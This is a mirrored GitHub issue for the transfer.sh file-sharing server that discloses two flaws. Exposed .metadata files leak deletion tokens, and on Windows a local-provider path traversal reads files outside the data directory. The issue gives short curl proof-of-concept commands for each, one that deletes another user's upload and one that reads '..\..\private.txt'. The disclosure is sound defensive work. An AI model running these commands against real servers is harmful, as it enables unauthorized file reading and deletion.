[Security] Arbitrary reading of data from backing local storage provider #210

New Issue

Closed

opened 2026-01-19 18:29:26 +00:00 by michael · 2 comments

michael commented 2026-01-19 18:29:26 +00:00

Owner

Copy Link

Originally created by @cheeseandcereal on GitHub.

Right now, the server does not require that a file's .metadata neighboring file has to exist before serving it due to this logic: 8a5c737140/server/handlers.go (L616-L621)

This is an extreme oversight, as it leads to serious security implications.

Firstly, given the known URL of an item on the server, you can freely read it's metadata, which includes its delete token and simply delete it.

POC:

URL='http://localhost:8080/dRz9w/thing'
curl -X DELETE "$URL/$(curl $URL.metadata | jq -r .DeletionToken)"
echo "And poof. It's gone"

However, even worse than this, it's allowing arbitrary traversal and reading of the filesystem if the provider is local and is not using a posix-style path such as windows. Take the following directory tree:

C:\USERS\ME\DOWNLOADS
├── data
│   └── AHWlO
│       ├── test.txt
│       └── test.txt.metadata
├── private.txt
└── transfersh.exe

Now start transfersh.exe like so:

C:\USERS\ME\DOWNLOADS\transfersh.exe --provider local --basedir C:\USERS\ME\DOWNLOADS\data

Now run the following curl:

curl localhost:8080/AHWlO/..\..\private.txt

And the server will happily read and send the contents of private.txt in the response body.

This is obviously extremely dangerous and should be patched/released and possibly some sort of deprecation/security warning should be given about all previous releases.

Originally created by @cheeseandcereal on GitHub. Right now, the server does not require that a file's `.metadata` neighboring file has to exist before serving it due to this logic: https://github.com/dutchcoders/transfer.sh/blob/8a5c7371408c4e76a798ace93fecd94ea9c6c38e/server/handlers.go#L616-L621 This is an extreme oversight, as it leads to serious security implications. Firstly, given the known URL of an item on the server, you can freely read it's metadata, which includes its delete token and simply delete it. POC: ```sh URL='http://localhost:8080/dRz9w/thing' curl -X DELETE "$URL/$(curl $URL.metadata | jq -r .DeletionToken)" echo "And poof. It's gone" ``` However, even worse than this, it's allowing arbitrary traversal and reading of the filesystem if the provider is local and is not using a posix-style path such as windows. Take the following directory tree: ``` C:\USERS\ME\DOWNLOADS ├── data │   └── AHWlO │   ├── test.txt │   └── test.txt.metadata ├── private.txt └── transfersh.exe ``` Now start transfersh.exe like so: ```bat C:\USERS\ME\DOWNLOADS\transfersh.exe --provider local --basedir C:\USERS\ME\DOWNLOADS\data ``` Now run the following curl: ```bat curl localhost:8080/AHWlO/..\..\private.txt ``` And the server will happily read and send the contents of private.txt in the response body. This is obviously extremely dangerous and should be patched/released and possibly some sort of deprecation/security warning should be given about all previous releases.

michael closed this issue 2026-01-19 18:29:26 +00:00

michael commented 2026-01-19 18:29:26 +00:00

Author

Owner

Copy Link

@cheeseandcereal commented on GitHub:

Yeah, sorry @aspacca. I was looking for a security contact, but couldn't find anything in the repository. Probably worth putting something here to prevent that in the future: https://github.com/dutchcoders/transfer.sh/security/policy

@cheeseandcereal commented on GitHub: Yeah, sorry @aspacca. I was looking for a security contact, but couldn't find anything in the repository. Probably worth putting something here to prevent that in the future: https://github.com/dutchcoders/transfer.sh/security/policy

michael commented 2026-01-19 18:29:26 +00:00

Author

Owner

Copy Link

@paolafrancesca commented on GitHub:

good catch @cheeseandcereal , I would have preferred a responsible disclosure anyway (https://en.wikipedia.org/wiki/Responsible_disclosure)

@paolafrancesca commented on GitHub: good catch @cheeseandcereal , I would have preferred a responsible disclosure anyway (https://en.wikipedia.org/wiki/Responsible_disclosure)

Sign in to join this conversation.

No Branch/Tag Specified

Branches Tags

main

dependabot/go_modules/golang.org/x/crypto-0.45.0

dependabot/go_modules/golang.org/x/net-0.38.0

revert-646-main

dependabot/go_modules/golang.org/x/oauth2-0.27.0

check-ci-20241026

aspacca-patch-1

seed-rand

fix-basic-auth

fix-header-map-change-after-writeheader-call

issue-503

issue-487

gpg-encryption-support

lint-accept-range

bump-min-go-version-and-include-tip

accept-range

local-google-fonts

parallel-range-requests

issue-485

sb/storj-bump

fix-perform-clamav-prescan

revert-389-clamav-prescan

clamav-prescan

changes-in-front-end

ISSUE-440

revert-422-main

master

golint

ISSUE-398

multiple-fixes

ISSUE-382-take2

ISSUE-382

fix-workflows

fixes-20210521

ISSUE-371

ISSUE-38-WEB

ISSUE-313

ISSUE-296

fuzz

BINARY-RELEASES

ISSUE-256

v1.6.1

v1.6.0

v1.5.0

v1.4.0

v1.3.1

v1.3.0

v1.2.6

v1.2.4

v1.2.3

v1.2.2

v1.2.1

v1.2.0

v1.1.7

v1.1.6

v1.1.5

v1.1.4

v1.1.3

v1.1.2

v1.1.1

v1.1.0

v1.0.0

Labels

Clear labels

bug

docker

enhancement

hacktoberfest

help wanted

invalid

question

storage provider

No Label

Milestone

No items

No Milestone

Projects

Clear projects

No project

Assignees

Clear assignees

michael

No Assignees

1 Participants

Notifications

Subscribe

Due Date

No due date set.

Dependencies

No dependencies set.

Reference: dutchcoders/transfer.sh#210